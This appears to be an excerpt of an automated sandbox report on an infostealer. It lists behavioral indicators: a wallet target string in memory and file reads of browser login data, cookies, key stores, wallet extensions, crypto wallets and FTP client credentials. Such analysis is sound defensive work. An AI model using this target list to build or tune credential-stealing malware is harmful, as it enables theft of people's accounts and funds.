Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 167c7bdf2f.exe, 0000001D.00000003.2920552958.000000000134A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
